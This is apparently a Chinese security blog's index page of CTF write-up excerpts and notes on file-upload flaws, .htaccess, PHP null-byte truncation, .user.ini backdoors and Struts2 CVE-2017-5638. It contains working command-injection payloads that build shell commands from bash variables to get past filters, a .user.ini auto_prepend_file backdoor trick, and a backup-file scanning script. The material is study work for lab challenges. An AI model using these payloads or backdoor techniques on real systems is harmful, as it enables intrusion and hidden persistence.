发表于 | 分类于

web118

//利用系统变量构造nl命令

${PATH:~A}${PWD:~A}$IFS????.???

web119

学到一个新技能,使用wappalyzer可以得到web的服务器和php版本

image-20230812211831736

们先来看一下我们能用的数字有哪些:
0:可以用字符代替;
1:

1
${#SHLVL}=1,或者${##}、${#?}。
1
SHLVL是记录多个 Bash 进程实例嵌套深度的累加器,进程第一次打开shell时${#SHLVL}=1,然后在此shell中再打开一个shell时${#SHLVL}=2。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
2:`用wappalyzer插件可以看到php的版本是7.3.22,所以2可以用${PHP_VERSION:~A}代替。`
3:`${#IFS}=3。(linux下是3,mac里是4)`
4或者5:${#RANDOM}返回的值大多数是4和5,其中5的概率多一些。(linux下)

$`{PWD} :/var/www/html
${USER} :www-data`
`${HOME} :当前用户的主目录`

`开始构造:可以构造一下/bin/cat`
`/:${PWD::${#SHLVL}}
a:${USER:~A}`
`t:${USER:~${#SHLVL}:${#SHLVL}}`
`(a和t可以挑一个构造即可)`

`payload1:构造/???/?a? ????.???`

`${PWD::${#SHLVL}}???${PWD::${#SHLVL}}?${USER:~A}? ????.???

web120

传参

1
code=${PWD::${#SHLVL}}???${PWD::${#SHLVL}}?${USER:~A}? ????.???

image-20230812214903613

按指定的字符串截取

(1)第一种方法:

1
2
3
4
5
6
7
8
`从左向右截取最后一个string后的字符串`
`${varible##*string}
从左向右截取第一个string后的字符串
${varible#*string}
从右向左截取最后一个string后的字符串
${varible%%string*}`
`从右向左截取第一个string后的字符串`
`${varible%string*}`

“*”只是一个通配符可以不要

请看下面的例子:

1
2
3
4
5
$ MYVAR=foodforthought.jpg
$ echo ${MYVAR##*fo}
rthought.jpg
$ echo ${MYVAR#*fo}
odforthought.jpg

(2)第二种方法:

${varible:n1:n2}:截取变量varible从n1开始的n2个字符,组成一个子字符串。可以根据特定字符偏移和长度,使用另一种形式的变量扩展,来选择特定子字符串。试着在 bash 中输入以下行:

1
2
3
4
5
$ EXCLAIM=cowabunga
$ echo ${EXCLAIM:0:3}
cow
$ echo ${EXCLAIM:3:7}
abunga

这种形式的字符串截断非常简便,只需用冒号分开来指定起始字符和子字符串长度。

阅读全文 »

发表于 | 分类于

.htaccess

基本概念

.htaccess 文件是Apache中有一种特殊的文件,其提供了针对目录改变配置的方法,即在一个特定的文档目录中放置一个包含一条或多条指令的文件,以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过 Apache 的 AllowOverride 指令来设置。

.htaccess 中有 # 单行注释符,且支持 \ 拼接上下两行。

阅读全文 »

发表于 | 分类于

何为文件上传漏洞

  • 文件上传漏洞可以说是日常渗透测试中用得最多的一个漏洞,用它获得服务器权限最快最直接。在Web程序中,经常需要用到文件上传的功能。如用户或者管理员上传图片,或者其它文件。如果没有限制上传类型或者限制不严格被绕过,就有可能造成文件上传漏洞。如果上传了可执行文件或者网页脚本,就会导致网站被控制甚至服务器沦陷。复杂一点的情况是配合 Web Server的解析漏洞来获取控制权或结合文件包含漏洞。
阅读全文 »

发表于 | 分类于

PHP 5.2 00截断上传

漏洞简介

PHP的00截断是5.2.x版本的一个漏洞,当用户输入的url参数包含%00经过浏览器自动转码后截断后面字符。

漏洞示例代码

例如url输入的文件名1.txt%00.jpg经过url转码后会变为1.txt\000.jpg,测试文件1.php如下

1
2
3
<?php
    include "1.txt\000.jpg";
?>

测试文件1.txt如下

1
2
3
<?php
    echo 'fireXXX';
?>

php5.2.x版本解析1.php时,会将1.txt\000.jpg解释为1.txt

修复

只要比较发现文件名的strlen长度和语法分析出来的长度不一样,就说明内部存在截断的字符,因此输出了打开文件失败的信息。

发表于 | 分类于

PHP文件.user.ini的利用

php.ini是php的一个全局配置文件,对整个web服务起作用;而.user.ini和.htaccess一样是目录的配置文件,.user.ini就是用户自定义的一个php.ini,我们可以利用这个文件来构造后门和隐藏后门。

实例
php 配置项中有两个配置可以起到一些作用

1
2
3
auto_prepend_file = <filename>         //包含在文件头
auto_append_file = <filename>          //包含在文件尾

这两个配置项的作用相当于一个文件包含,比如

1
2
3
4
5
// .user.ini
auto_prepend_file = 1.jpg
// 1.jpg
<?php phpinfo();?>
// 1.php(任意php文件)

满足这三个文件在同一目录下,则相当于在1.php文件里插入了包含语句require(‘1.png’),进行了文件包含。

另一条配置包含在文件尾,如果遇到了 exit 语句的话就会失效。

.user.ini使用范围很广,不仅限于 Apache 服务器,同样适用于 Nginx 服务器,只要服务器启用了 fastcgi 模式 (通常非线程安全模式使用的就是 fastcgi 模式)。

局限
在.user.ini中使用这条配置也说了是在同目录下的其他.php 文件中包含配置中所指定的文件,也就是说需要该目录下存在.php 文件,通常在文件上传中,一般是专门有一个目录用来存在图片,可能小概率会存在.php 文件。

但是有时可以使用 ../ 来将文件上传到其他目录,达到一个利用的效果。

发表于 | 分类于

web89

题目源码

image-20230816205336758

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-18 15:38:51
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


include("flag.php");
highlight_file(__FILE__);

if(isset($_GET['num'])){
    $num = $_GET['num'];
    if(preg_match("/[0-9]/", $num)){
        die("no no no!");
    }
    if(intval($num)){
        echo $flag;
    }
}

新的系列开始了,还没练过,让我看看都是什么怪物,bangbang炸弹全部拿捏

阅读全文 »

发表于 | 分类于

week1

泄漏的秘密

利用脚本扫描目录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
import requests
 
if __name__ == '__main__':
    # url为被扫描地址,后不加‘/’
    url1 = 'http://5ecf5c5c-64e6-4e5e-9706-9faea69a3533.node4.buuoj.cn:81'		
 
    # 常见的网站源码备份文件名
    list1 = ['web', 'website', 'backup', 'back', 'www', 'wwwroot', 'temp']
    # 常见的网站源码备份文件后缀
    list2 = ['tar', 'tar.gz', 'zip', 'rar']
 
    for i in list1:
        for j in list2:
            back = str(i) + '.' + str(j)
            url = str(url1) + '/' + back
            print(back + '    ', end='')
            print(requests.get(url).status_code)
阅读全文 »

发表于 | 分类于

struts2漏洞

漏洞介绍

全部题都是struts2框架漏洞,Struts2是用Java语言编写的一个基于MVC设计模式的Web应用框架

2017年3月6日,Apache Struts 2被曝存在远程命令执行漏洞。在使用基于Jakarta插件的文件上传功能条件下,恶意用户可以通过修改HTTP请求头中的Content-Type值构造恶意代码,在服务器上执行系统命令,完全控制该服务器,最后达到挖矿、对外攻/击、数据窃取勒索、篡改为菠菜站等目的。漏洞利用所需组件默认启用,风险等级为高危。

2.漏洞编号

  • CVE-2017-5638
  • CNNVD-201703-152

3.影响的Struts2版本

  • Struts 2.3.5 – Struts 2.3.31
  • Struts 2.5 – Struts 2.5.1
阅读全文 »